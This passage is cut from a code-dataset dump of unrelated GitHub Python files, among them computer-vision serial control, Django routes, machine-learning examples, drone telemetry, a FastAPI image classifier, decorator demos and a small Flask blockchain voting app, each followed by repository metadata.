cv2.FONT_HERSHEY_DUPLEX,2, (254,67,101), 2)\n cv2.putText(image, \"thresh:%d f:%.2f bias:%d\"%(rb.select_threshold,rb.depth_coefficient,rb.x_bias),(20,350), cv2.FONT_HERSHEY_DUPLEX,2, (100,100,100), 2)\n cv2.resizeWindow(rb.windowname,800, 600) # 设置长和宽\n y_min=400\n cv2.line(image,(0,y_min),(image.shape[1],y_min),(0,0,255),2,8)\n cv2.line(image,(int(image.shape[1]/2)+rb.x_bias,0),(int(image.shape[1]/2+rb.x_bias),image.shape[0]),(0,0,255),2,8)\n if not args.dont_show:\n cv2.imshow(rb.windowname, image)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n if cv2.waitKey(fps) & 0xff == ord('q'):\n break\n if cv2.waitKey(fps) & 0xff == ord('v'):\n rb.cmd = 'v'\n if cv2.waitKey(fps) & 0xff == ord('b'):\n rb.cmd = 'b'\n cap.release()\n video.release()\n cv2.destroyAllWindows()\n\ndef serial_(rb):\n \n buf = array.array('B', [0] * 10)\n # 10个16进制数组 buf[0]-buf[4] 固定\n # buf[5] buf[6] x\n # buf[7]buf[8] d\n buf[0] = 0x40\n buf[1] = 0x5E\n buf[2] = 0x76\n buf[3] = 0x00\n buf[4] = 0x00\n\n\n\n ser = serial.Serial(serial_name,115200, timeout=0.5)\n\n def send_data(x, d):\n buf[5] = int(hex(x // 256),16)\n buf[6] = int(hex(x % 256),16)\n buf[7] = int(hex(d // 256),16)\n buf[8] = int(hex(d % 256),16)\n suma = 0\n for i in range(9):\n suma = suma + buf[i]\n buf[9] = (suma) & 0xff\n ser.write(buf)\n print(\"正在发送数据... 波特率:%d\"%ser.baudrate)\n while 1:\n try:\n if ser.inWaiting() > 0:\n rb.cmd = ser.read(1).decode()\n time.sleep(0.1)\n if (rb.y > 400) & (rb.d < 4000):\n rb.can_be_sent = True\n else:\n rb.can_be_sent = False\n rb.x = change_rbx(rb,X_DEVIATION)\n if rb.can_be_sent:\n send_data(rb.x,int(rb.d))\n\n else:\n send_data(0,0)\n #print((rb.x,rb.y,rb.d,rb.can_be_sent))\n except serial.SerialException as e:\n # There is no new data from serial port\n print(\"串口断开..\")\n time.sleep(5)\n for i in range(10):\n ser = serial.Serial(serial_name,115200, timeout=1)\n\n\n except TypeError as e:\n\t\t# Disconnect of USB->UART occured\n return None\n else:\n continue\n \ndef check_ball_pos(rb,y_min=400,d_min = 2000):\n if (rb.y > y_min) & (rb.d < d_min):\n rb.can_be_sent = True\n else:\n rb.can_be_sent = False\n\ndef change_rbx(rb,x):\n if abs(rb.x-256) < x:\n return 256\n else:\n return rb.x\n\nif __name__ == '__main__':\n frame_queue = Queue()\n darknet_image_queue = Queue(maxsize=1)\n detections_queue = Queue(maxsize=1)\n fps_queue = Queue(maxsize=1)\n rb = RB()\n rb.select_threshold=THRESHOLD\n rb.depth_coefficient=DEPTH_COEFFICIENT\n rb.x_bias=X_BIAS\n args = parser()\n check_arguments_errors(args)\n network, class_names, class_colors = darknet.load_network(\n args.config_file,\n args.data_file,\n args.weights,\n batch_size=1\n )\n darknet_width = darknet.network_width(network)\n darknet_height = darknet.network_height(network)\n input_path = str2int(args.input)\n \n cap = cv2.VideoCapture(1)\n cap.set(3,640)\n cap.set(4,480)\n Thread(target=serial_,args=(rb,)).start()\n Thread(target=video_capture, args=(frame_queue, darknet_image_queue)).start()\n Thread(target=inference, args=(darknet_image_queue, detections_queue, fps_queue,rb)).start()\n Thread(target=drawing, args=(frame_queue, detections_queue, fps_queue,rb)).start()\n","repo_name":"SHUStriveMotionTeam/VisionTeam_Yolo","sub_path":"darknet_video.py","file_name":"darknet_video.py","file_ext":"py","file_size_in_byte":13190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17530717238","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('ege/', views.ege, name='ege'),\n path('index/', views.index, name='index'),\n path('probls////', views.probls, name='probls'),\n path('task//', views.task, name='task'),\n path('theme//', views.theme, name='theme')\n]\n","repo_name":"mmt-48/ege","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33603674279","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nx_data = np.random.rand(100).astype(np.float32)\ny_data = x_data*0.1 + 0.3\n\n\nWeights = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\nbiases = tf.Variable(tf.zeros([1]))\ny = Weights*x_data + biases\n\n# biases_stop = tf.stop_gradient(biases)\n# y_stop = Weights*x_data + biases_stop\n\n# loss_stop = tf.reduce_mean(tf.square(y_stop-y_data))\nloss = tf.reduce_mean(tf.square(y-y_data))\n\noptimizer = tf.train.GradientDescentOptimizer(0.1)\n\ntrain = optimizer.minimize(loss)\n# train_stop = optimizer.minimize(loss_stop)\n\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\nfor step in range(1001):\n sess.run(train)\n\n # if step < 10:\n # sess.run(train)\n # else :\n # sess.run(train_stop)\n # if sess.run(loss_stop) > 0.05:\n # sess.run(train)\n if step % 20 == 0:\n print(step, sess.run(Weights), sess.run(biases), sess.run(loss))\n\n# draw\nWeights = sess.run(Weights)\nbiases = sess.run(biases)\ny = sess.run(y)\n\n# draw\nplt.plot(x_data, y_data, \"+\")\nplt.plot(x_data, y)\nplt.show()\n\n# gradients = optimizer.compute_gradients(loss)\n# print(sess.run(gradients))\n","repo_name":"overfitover/qapnet","sub_path":"work_logs/exams/number_predice.py","file_name":"number_predice.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14093139345","text":"import read_csv\nimport utils\nimport charts\n\ndef run():\n data = read_csv.read_csv('./world_population.csv')\n country = input('Ingrese el nombre del país de interés: ')\n info_pais = utils.data_by_country(data, country)\n print(info_pais)\n \n if len(info_pais) > 0:\n country = info_pais[0]\n labels, values = utils.population(country)\n charts.generate_bar_chart(labels, values)\n \nif __name__ == '__main__':\n run()","repo_name":"NestorSchneemann/world_population","sub_path":"crec_poblacional.py","file_name":"crec_poblacional.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22004663456","text":"from dronekit import connect, VehicleMode, LocationGlobalRelative, APIException\nimport time\nimport socket\nimport exceptions\nimport math\nimport argparse ## parse cmd args\n\n\n############# FUNCTIONS #############\n\n\n\n# Capable of launching and connecting to a virtual drone, or the real thing.\n# If sitlInstance = True, then connect to sitl, o/w connect to RPi + Pixhawk.\ndef connectToDrone(sitlInstance):\n\n if sitlInstance:\n vehicle = connect('udp:127.0.0.1:14550', wait_ready=True)\n else:\n vehicle = connect('/dev/ttyAMA0', baud = 57600, wait_ready = True)\n\n return vehicle\n# connectDrone()\n\n\n\n# prints useful attribute data representative of our vehicle's state\n# uses dronekit as an API to ardupilot to access most attributes\n# usage: $ python attribute_fetch.py\ndef fetchAndPrintAttributes(vehicle):\n\n # version and attributes\n vehicle.wait_ready('autopilot_version')\n print('Autopilot version: %s'%vehicle.version)\n\n # bool check if the firmware supports our on-board \n # computer for attitude setter capabilities\n print('Attitude set is supported: %s'%vehicle.capabilities.set_attitude_target_local_ned)\n\n # read the latitude, longitude, altitude, coords in the global frame\n print('Position: %s'%vehicle.location.global_relative_frame)\n\n # read attitude, roll, pitch, and yaw\n print('Attitude: %s'%vehicle.attitude)\n\n # read velocity (m/s) in NED coords\n print('Velocity: %s'%vehicle.velocity)\n\n # when was the last h.beat?\n print('Last heartbeat was: %s'%vehicle.last_heartbeat)\n\n # bool check the armable state\n print('Armable: %s'%vehicle.is_armable)\n\n # setter\n print('Groundspeed: %s'%vehicle.groundspeed)\n\n # print the flight mode\n print('Mode: %s'%vehicle.mode.name)\n\n # arm setter (returns 1 if props are spinning)\n print('Armed: %s'%vehicle.armed)\n\n # print the state estimation filter status\n print('Position: %s'%vehicle.ekf_ok)\n\n\n\n\n\n\n\n############# MAIN #############\n\n# flag to initialize sitl instance \n# (change to true for simulations)\n#initSitl = True\ninitSitl = False\n\n# connect to the drone\nvehicle = connectToDrone(initSitl)\n\n# print drone data\nfetchAndPrintAttributes(vehicle)\n\nvehicle.close()\n\n","repo_name":"5anperez/Robotics-UAV-PL","sub_path":"attribute_fetch.py","file_name":"attribute_fetch.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73854614812","text":"import requests\n\nbase_url = \"http://demo.codingnomads.co:8080/tasks_api/users\"\nrequest = requests.get(base_url)\n\ntype(request.content) # \n\n# query parameters \nparams_url = \"http://demo.codingnomads.co:8080/tasks_api/tasks?userId=1&complete=true\"\nreq2 = requests.get(params_url)\n\n# chk = request.content.decode('utf-8')\nchk = request.json()\ntype(chk) # dict()\n\nchk.keys()\nlen(chk)\n\n# query params 2\nparams_url2 = \"http://demo.codingnomads.co:8080/tasks_api/users\"\n\nparams = {\n \"email\": \"helmeczybruno32@gmail.com\"\n # \"email\": \"ryan@codingnomads.co\"\n}\n\nres = requests.get(params_url2, params = params)\n\nres.json()\n\n\n# Play around with codingnomads API ----\nimport pandas as pd\n\nbase_url = \"http://demo.codingnomads.co:8080/tasks_api\"\nusers = requests.get(base_url + '/users')\ndf = pd.DataFrame(users.json()['data'])\n\n\n","repo_name":"BrunoHelmeczy/Python_Studies","sub_path":"CodingNomads/Python_201/course_resources/07_apis/requests_101.py","file_name":"requests_101.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70882981852","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass Migration(migrations.Migration):\n def create_project_lock(apps, schema_editor):\n ProjectLock = apps.get_model(\"im\", \"ProjectLock\")\n try:\n ProjectLock.objects.get(id=1)\n except ObjectDoesNotExist:\n ProjectLock.objects.create(id=1)\n\n dependencies = [\n ('im', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(create_project_lock),\n ]\n","repo_name":"grnet/synnefo","sub_path":"snf-astakos-app/astakos/im/migrations/0002_auto_projectlock.py","file_name":"0002_auto_projectlock.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"} +{"seq_id":"30147761337","text":"\"\"\"\r\n\n\nWrite a function that replaces every row and column that contains at least one\n**1** into a row/column that is filled **entirely** with **1s**.\n\nSolve this **without** returning a copy of the input list.\n\n### Examples\n\n ones_infection([\n [0, 0, 1],\n [0, 0, 0],\n [0, 0, 0]\n ]) ➞ [\n [1, 1, 1],\n [0, 0, 1],\n [0, 0, 1]\n ]\n \n ones_infection([\n [1, 0, 1, 0],\n [0, 1, 0, 0],\n [0, 0, 0, 0]\n ]) ➞ [\n [1, 1, 1, 1],\n [1, 1, 1, 1],\n [1, 1, 1, 0]\n ]\n \n ones_infection([\n [0, 1, 0, 1],\n [0, 0, 0, 0],\n [0, 1, 0, 0]\n ]) ➞ [\n [1, 1, 1, 1],\n [0, 1, 0, 1],\n [1, 1, 1, 1]\n ]\n\n### Notes\n\n * You must **mutate** the original matrix.\n * Input matrices will have at least row and one column.\n * **Bonus** : Solve this **without** using any higher-order functions.\n\n\"\"\"\r\n\ndef ones_infection(arr):\n copy = arr.copy()\n cols = []\n for r in range(len(arr)):\n for c in range(len(arr[0])):\n if copy[r][c] == 1:\n arr[r] = [1]*len(arr[r])\n cols.append(c)\n for col in cols:\n for r in range(len(arr)):\n arr[r][col] = 1\n return arr\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"tY5fmSbk85N8digXQ_3.py","file_name":"tY5fmSbk85N8digXQ_3.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30125300018","text":"t = int(input())\nfor case_num in range(t):\n n = int(input())\n a = list(map(int, input().split(' ')))\n swap = 0\n swapped = True\n while swap < n:\n swapped = False\n mi = -1\n m = n + 1\n for i in range(swap, n):\n if a[i] < m:\n m = a[i]\n mi = i\n b = a.copy()\n b[swap] = m\n for j in range(swap + 1, mi + 1):\n swapped = True\n b[j] = a[j - 1]\n swap = mi if swapped else swap + 1\n a = b\n print(' '.join(map(str, a)))\n","repo_name":"lucifer1004/codeforces","sub_path":"1256/b/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"20811995289","text":"import io\nimport os\n\nimport cv2\nimport numpy as np\nfrom fastapi import FastAPI, File, UploadFile\nfrom fastapi.responses import FileResponse, PlainTextResponse\nfrom utils import classify_image\n\napp = FastAPI(\n title=\"AI Image Classification API\",\n description=\"\"\"An API for classifying Images into AI and Human\"\"\",\n)\n\n\n\n@app.get(\"/\", response_class=PlainTextResponse, tags=[\"home\"])\nasync def home():\n note = \"\"\"\n AI Image Detection API 🖼️\\nAn API for detecting AI Generated Images AI\\nNote: add \\\"/redoc\\\" to get the complete documentation.\n \"\"\"\n return note\n\n@app.post(\"/classify-image\")\nasync def get_image(file: UploadFile = File(...)):\n\n contents = io.BytesIO(await file.read())\n file_bytes = np.asarray(bytearray(contents.read()), dtype=np.uint8)\n img = cv2.imdecode(file_bytes, cv2.IMREAD_COLOR)\n cv2.imwrite(\"images.jpg\", img)\n try:\n data = classify_image(\"images.jpg\")\n return data\n except ValueError as e:\n e = \"Error! Please upload a valid image type.\"\n return e","repo_name":"abdelrhmangit/id","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15303773843","text":"import time\n\n\ndef get_tick_rate(clock_func: callable) -> float:\n start_time = time.time()\n measurements = [clock_func() for _ in range(2_000_000)]\n end_time = time.time()\n\n ticks = 0\n prev_value = measurements[0]\n for current_value in measurements[1:]:\n if current_value < prev_value:\n raise RuntimeError(\"Clock function is not monotonic\")\n if current_value != prev_value:\n ticks += 1\n prev_value = current_value\n\n return ticks / (end_time - start_time) # ticks per second\n\n\nif __name__ == \"__main__\":\n clock_funcs = {\n \"time \": time.time,\n \"time_ns \": time.time_ns,\n \"monotonic \": time.monotonic,\n \"monotonic_ns \": time.monotonic_ns,\n \"perf_counter \": time.perf_counter,\n \"perf_counter_ns\": time.perf_counter_ns,\n }\n\n for name, func in clock_funcs.items():\n print(f\"Tick rate for {name}: {get_tick_rate(func) / 1_000_000.0:.3f}M ticks/second\")\n","repo_name":"mkrd/DictDataBase","sub_path":"tests/system_checks/test_tick_rate.py","file_name":"test_tick_rate.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":198,"dataset":"github-code","pt":"32"} +{"seq_id":"40813630259","text":"# individual network settings for each actor + critic pair\n# see networkforall for details\n\nfrom Networks import Critic,Actor\nfrom utilities import hard_update\nfrom torch.optim import Adam\nimport torch\nimport numpy as np\nfrom copy import deepcopy\n\n# add OU noise for exploration\nfrom OUNoise import OUNoise\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass DDPGAgent:\n def __init__(self, stateSize,actionSize, lr_actor=1.0e-3, lr_critic=1.0e-3):\n super(DDPGAgent, self).__init__()\n\n\n #initialize actor, target actor, critic and target critic for each agent\n self.actor = Actor(actionSize,stateSize).to(device)\n self.critic = Critic(actionSize,stateSize).to(device)\n self.target_actor = deepcopy(Actor(actionSize,stateSize)).to(device)\n self.target_critic = deepcopy(Critic(actionSize,stateSize)).to(device)\n\n #initialize OU noise\n self.noise = OUNoise(mu=np.zeros(actionSize), sigma=0.01)\n\n \n # initialize targets same as original networks\n hard_update(self.target_actor, self.actor)\n hard_update(self.target_critic, self.critic)\n\n #we choose adam as an optimizer for both actor and critic\n self.actor_optimizer = Adam(self.actor.parameters(), lr=lr_actor)\n self.critic_optimizer = Adam(self.critic.parameters(), lr=lr_critic)\n\n\n #compute action of the local actor by the current actor and add OU noise on top\n def act(self, obs, noise=0.0):\n self.actor.eval()\n action = self.actor(obs) + noise*torch.FloatTensor(self.noise()).to(device)\n self.actor.train()\n return action\n\n #compute action of the target actor by the current actor and add OU noise on top\n def target_act(self, obs, noise=0.0):\n action = self.target_actor(obs) + noise*torch.FloatTensor(self.noise()).to(device)\n return action\n","repo_name":"commanderka/udacity","sub_path":"project3_collab-compet/ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25825066013","text":"from torch import nn\r\nclass Linear_mnist(nn.Module):\r\n def __init__(self,input_size =3 * 28 * 28, final_dim=100):\r\n super(Linear_mnist, self).__init__()\r\n hidden_dim = 100\r\n lin1 = nn.Linear(input_size, hidden_dim)\r\n self.imput_size = input_size\r\n lin2 = nn.Linear(hidden_dim, hidden_dim)\r\n lin3 = nn.Linear(hidden_dim, hidden_dim)\r\n lin4 = nn.Linear(hidden_dim, 10)\r\n lin_contra_f = nn.Linear(hidden_dim, final_dim)\r\n self.final_cls = lin4\r\n self._features = nn.Sequential(lin1, nn.ReLU(), lin2, nn.ReLU(), lin3, nn.ReLU())\r\n self.final_contra_cls_f = lin_contra_f\r\n def forward(self, input_imgs, need_features = False):\r\n input_imgs = input_imgs.permute(0, 3, 1, 2).contiguous().view(-1,self.imput_size)\r\n features = self._features(input_imgs)\r\n out = self.final_cls(features)\r\n if need_features:\r\n return features, out\r\n return out\r\n def get_features_contra(self, input_imgs):\r\n input_imgs = input_imgs.permute(0,3,1,2).contiguous().view(-1,self.imput_size)\r\n features = self._features(input_imgs)\r\n features = self.final_contra_cls_f(features)\r\n return features\r\n\r\nclass CNN_cifar(nn.Module):\r\n def __init__(self,args=None,input_channel = 3, hidden_channel = 32,further_cls = False):\r\n super(CNN_cifar, self).__init__()\r\n conv1 = nn.Conv2d(input_channel, hidden_channel, kernel_size= 3, stride= 2, padding = 1)\r\n conv2 = nn.Conv2d(hidden_channel, hidden_channel*2, kernel_size= 3, stride= 2, padding = 1)\r\n conv3 = nn.Conv2d(hidden_channel*2, hidden_channel*2, kernel_size= 3, stride= 2, padding = 1)\r\n lin4 = nn.Linear(hidden_channel* 2 * 4, 10)\r\n lin_contra_f = nn.Linear(hidden_channel* 2 * 4, args.contra_dim)\r\n for lin in [conv1, conv2, conv3, lin4, lin_contra_f]:\r\n nn.init.xavier_uniform_(lin.weight)\r\n nn.init.zeros_(lin.bias)\r\n self.final_cls = lin4\r\n self.contra_head = lin_contra_f\r\n self._features = nn.Sequential(conv1, nn.ReLU(True), conv2, nn.MaxPool2d(2), nn.ReLU(True), conv3, nn.Flatten())\r\n if further_cls:\r\n self.contra_cls = nn.Linear(args.contra_dim, 10)\r\n def forward(self, input_imgs, need_contra_features = False,need_contra_cls=False):\r\n features = self._features(input_imgs)\r\n if need_contra_features:\r\n features = self.contra_head(features)\r\n return features\r\n if need_contra_cls:\r\n features = self.contra_head(features)\r\n return self.contra_cls(features)\r\n out = self.final_cls(features)\r\n return out\r\n def get_features_contra(self, input):\r\n input = input.permute(0,3,1,2)\r\n features_origin = self._features(input)\r\n features = self.final_contra_cls_f(features_origin)\r\n return features\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"simpleshinobu/IRMCon","sub_path":"Biased_dataset/models/model_ours.py","file_name":"model_ours.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"70922488412","text":"from time import time\nimport math\nfrom functools import wraps\n\n\n# Example if we send an argument to decorator\ndef create_decorator(n):\n def decorator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n num_error = 0\n while True:\n try: # try to run\n start = time()\n result = func(*args, **kwargs)\n print('Time:{}'.format(time() - start))\n return result\n except ValueError:\n num_error += 1 # number of errors +1\n if num_error > n: # if n times => ValueError\n raise ValueError\n\n return wrapper\n\n return decorator\n\n\n# ----------------------------------\n# TEST 1:\n@create_decorator(2)\ndef stupid_func(*args, **kwargs):\n print('I\\'m stupid function')\n print('And I got these *args:')\n for i in args:\n print(i, end='')\n print('')\n print('And I got these **kwargs:')\n for key in kwargs.values():\n print(key, end=' ')\n print('')\n\n\nprint('TEST_1:')\nassert stupid_func(1, [1, 2, 3], 'AAAA', first='F!') is None\nassert stupid_func.__name__ == 'stupid_func'\n\n\n# ----------------------------------\n# TEST 2:\n@create_decorator(2)\ndef stupid_ret(x):\n return x + 1\n\n\nprint('TEST_2:')\nassert stupid_ret(99) == 100\nprint('----------------------------------')\n\n\n# ----------------------------------\n# TEST 3: *args and **kwargs\n@create_decorator(2)\ndef stupid_with_kw(a, b, x=None):\n print('I got variables: ', a, b)\n return x\n\n\nprint('TEST_3:')\nassert stupid_with_kw(1, 2, x=210) == 210\nprint('----------------------------------')\n\n# ----------------------------------------\n# TEST 4: if we don't have opportunity to define function via def:\nprint('TEST_4:')\ntemp_dec = create_decorator(4)\npow_ = temp_dec(math.pow)\nassert pow_(2, 3) == 8\n","repo_name":"DmitriiDenisov/examples_for_DS","sub_path":"Decorators/examp_2.py","file_name":"examp_2.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24827377214","text":"import datetime\nimport hashlib\nimport json\nfrom flask import Flask, jsonify, request\nfrom flask import Flask,jsonify\nimport requests\nfrom base64 import (\n b64encode,\n b64decode,\n)\n\nfrom Crypto.Hash import SHA256\nfrom Crypto.Signature import PKCS1_v1_5\nfrom Crypto.PublicKey import RSA\n\n\ncandidates={\"1\":'Narendra Modi',\"2\":\"Donald Trump\",\"3\":'Vladimir Vladimirovich Putin'}\nr=requests.get('http://192.168.43.54:5003/list')\nr=r.json()\n#r=requests.get('http://192.168.43.54:5003/list')\n#r=r.json()\nvoters=[]\nfor i in range(r['length']):\n block=[r['list'][i]['private_key'],r['list'][i]['name'],r['list'][i]['age'],r['list'][i]['gender'],r['list'][i]['publickey']]\n\n voters.append(block)\n\n\n\nfrom uuid import uuid4\nfrom urllib.parse import urlparse\nnode_address=str(uuid4()).replace('-','')\nclass Blockchain:\n def __init__(self):\n self.chain = []\n #self.vote=[]\n self.create_block('0','genesis',0,'0',0)\n self.nodes=set()\n\n def create_block(self,previous_hash,name,age,gender,vote):\n block = {\n \"index\": len(self.chain)+1,\n 'timestamp': str(datetime.datetime.now()),\n \"previous_hash\": previous_hash,\n \"name\":name,\n \"age\":age,\n \"gender\":gender,\n \"vote\":vote\n }\n\n self.chain.append(block)\n return block\n\n def get_previous_block(self):\n return self.chain[-1]\n\n def hash(self, block):\n encoded_block = json.dumps(block, sort_keys=True).encode()\n digest=SHA256.new()\n digest.update(encoded_block)\n return digest.hexdigest()\n\n def is_chain_valid(self, chain):\n previous_block = chain[0]\n block_index = 1\n while block_index < len(chain):\n block = chain[block_index]\n if block['previous_hash'] != self.hash(previous_block):\n return False\n return True\n\n def add_node(self,address):\n parsed_url=urlparse(address)\n self.nodes.add(parsed_url.netloc)\n\n def replace_chain(self):\n netwok=self.nodes\n longest_chain=None\n max_length=len(self.chain)\n for nodes in netwok:\n response=requests.get('http://'+node+'/get_chain')\n if response.status_code==200:\n length=response.json()['length']\n chain=response.json()['chain']\n if length > max_length and self.is_chain_valid(chain):\n max_length=length\n longest_chain=chain\n\n if longest_chain:\n self.chain=longest_chain\n return True\n else:\n return False\n\napp=Flask(__name__)\nblockchain=Blockchain()\n\n\n@app.route('/get_chain', methods=['GET'])\ndef get_chain():\n response = {'chain': blockchain.chain, 'length': len(blockchain.chain)}\n return jsonify(response), 200\n\n@app.route('/is_valid', methods=['GET'])\ndef is_valid():\n is_valid = blockchain.is_chain_valid(blockchain.chain)\n if is_valid:\n response = {'message': 'All good. The Blockchain is valid.'}\n else:\n response = {\n 'message':'The Blockchain is not valid.'\n }\n return jsonify(response), 200\n\n@app.route('/connect_node', methods=['POST'])\ndef connect_node():\n json=request.get_json()\n nodes=json.get('nodes')\n if nodes is None:\n return 400\n for node in nodes:\n blockchain.add_node(node)\n response={\"message\":\"all nodes connected\",\"nodes\":list(blockchain.nodes)}\n return jsonify(response),201\n\n@app.route('/replace_chain', methods=['GET'])\ndef replace_chain():\n is_chain_replaced = blockchain.replace_chain()\n if is_chain_replaced:\n response = {'message': 'chain replaced by longest','chain':blockchain.chain}\n else:\n response = {\n 'message':\n 'all good the chain is largest.'\n }\n return jsonify(response), 200\n\n@app.route('/vote', methods=['POST'])\ndef vote():\n json=request.get_json()\n previous_block = blockchain.get_previous_block()\n previous_hash = blockchain.hash(previous_block)\n candidate = request.form['candidate']\n key = request.form['key']\n name=\"\"\n age=\"\"\n gender=\"\"\n for i in voters:\n if i[0]==key:\n name=i[1]\n age=i[2]\n gender=i[3]\n\n block = blockchain.create_block(previous_hash,name,age,gender,candidate)\n block = blockchain.get_previous_block()\n hash = blockchain.hash(block)\n\n response = {'success': hash}\n return jsonify(response), 200\n\n\napp.run(host='0.0.0.0',port=5006)\n","repo_name":"Abhiyendra94/BLOCK-ELECT","sub_path":"blockchainf/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"11169346060","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\nimport satchmo.payment.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='CreditCardDetail',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('credit_type', satchmo.payment.fields.CreditChoiceCharField(max_length=16, choices=[(b'Mastercard', 'Mastercard'), (b'Visa', 'Visa'), (b'Visa Electron', 'Visa Electron'), (b'Solo', 'Solo'), (b'JCB', 'JCB'), (b'Maestro', 'Maestro'), (b'Laser', 'Laser')])),\n ('display_cc', models.CharField(max_length=4, verbose_name='CC Number (Last 4 digits)')),\n ('encrypted_cc', models.CharField(verbose_name='Encrypted Credit Card', max_length=40, null=True, editable=False, blank=True)),\n ('expire_month', models.IntegerField(verbose_name='Expiration Month')),\n ('expire_year', models.IntegerField(verbose_name='Expiration Year')),\n ('card_holder', models.CharField(max_length=60, verbose_name='card_holder Name', blank=True)),\n ('start_month', models.IntegerField(null=True, verbose_name='Start Month', blank=True)),\n ('start_year', models.IntegerField(null=True, verbose_name='Start Year', blank=True)),\n ('issue_num', models.CharField(max_length=2, null=True, blank=True)),\n ],\n options={\n 'verbose_name': 'Credit Card',\n 'verbose_name_plural': 'Credit Cards',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='PaymentOption',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.CharField(max_length=20, verbose_name='Description')),\n ('active', models.BooleanField(default=True, help_text='Should this be displayed as an option for the user?', verbose_name='Active')),\n ('optionName', satchmo.payment.fields.PaymentChoiceCharField(help_text='The class name as defined in payment.py', unique=True, max_length=20, choices=[(b'PAYMENT_PAYPAL', 'PayPal'), (b'PAYMENT_WORLDPAY', 'Credit / Debit card (WorldPay)')])),\n ('sortOrder', models.IntegerField(verbose_name='Sort Order')),\n ],\n options={\n 'verbose_name': 'Payment Option',\n 'verbose_name_plural': 'Payment Options',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"ToeKnee/jelly-roll","sub_path":"satchmo/payment/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71951495771","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 7 17:39:33 2022\r\n\r\n@author: Fan Luo\r\n\"\"\"\r\n\"\"\"\r\n164. Maximum Gap\r\n\r\nGiven an integer array nums, return the maximum difference between two successive elements in its sorted form. \r\nIf the array contains less than two elements, return 0.\r\n\r\nYou must write an algorithm that runs in linear time and uses linear extra space.\r\n\r\nInput: nums = [3,6,9,1]\r\nOutput: 3\r\nExplanation: The sorted form of the array is [1,3,6,9], either (3,6) or (6,9) has the maximum difference 3.\r\n\"\"\"\r\n\r\nfrom collections import defaultdict\r\n\r\nclass Solution:\r\n def maximumGap(self, nums):\r\n low, high, N = min(nums), max(nums), len(nums)\r\n \r\n if N <= 2 or low == high:\r\n return high - low\r\n \r\n bucket = defaultdict(list)\r\n \r\n for n in nums:\r\n ind = N -2 if n == high else (n - low) *(N - 1) //(high - low)\r\n bucket[ind].append(n)\r\n \r\n res = [[min(bucket[i]), max(bucket[i])] for i in range(N - 1) if bucket[i]]\r\n return max(y[0] - x[1] for x, y in zip(res, res[1:]))","repo_name":"fanluo12/Leetcode_python","sub_path":"BucketSort/164_Maximum_Gap.py","file_name":"164_Maximum_Gap.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6755970663","text":"import base64\nimport json\n\ndef handler(event, context):\n print(event[0])\n\n for payload in event:\n result = {\n \"statusCode\": 200,\n \"headers\": {\n 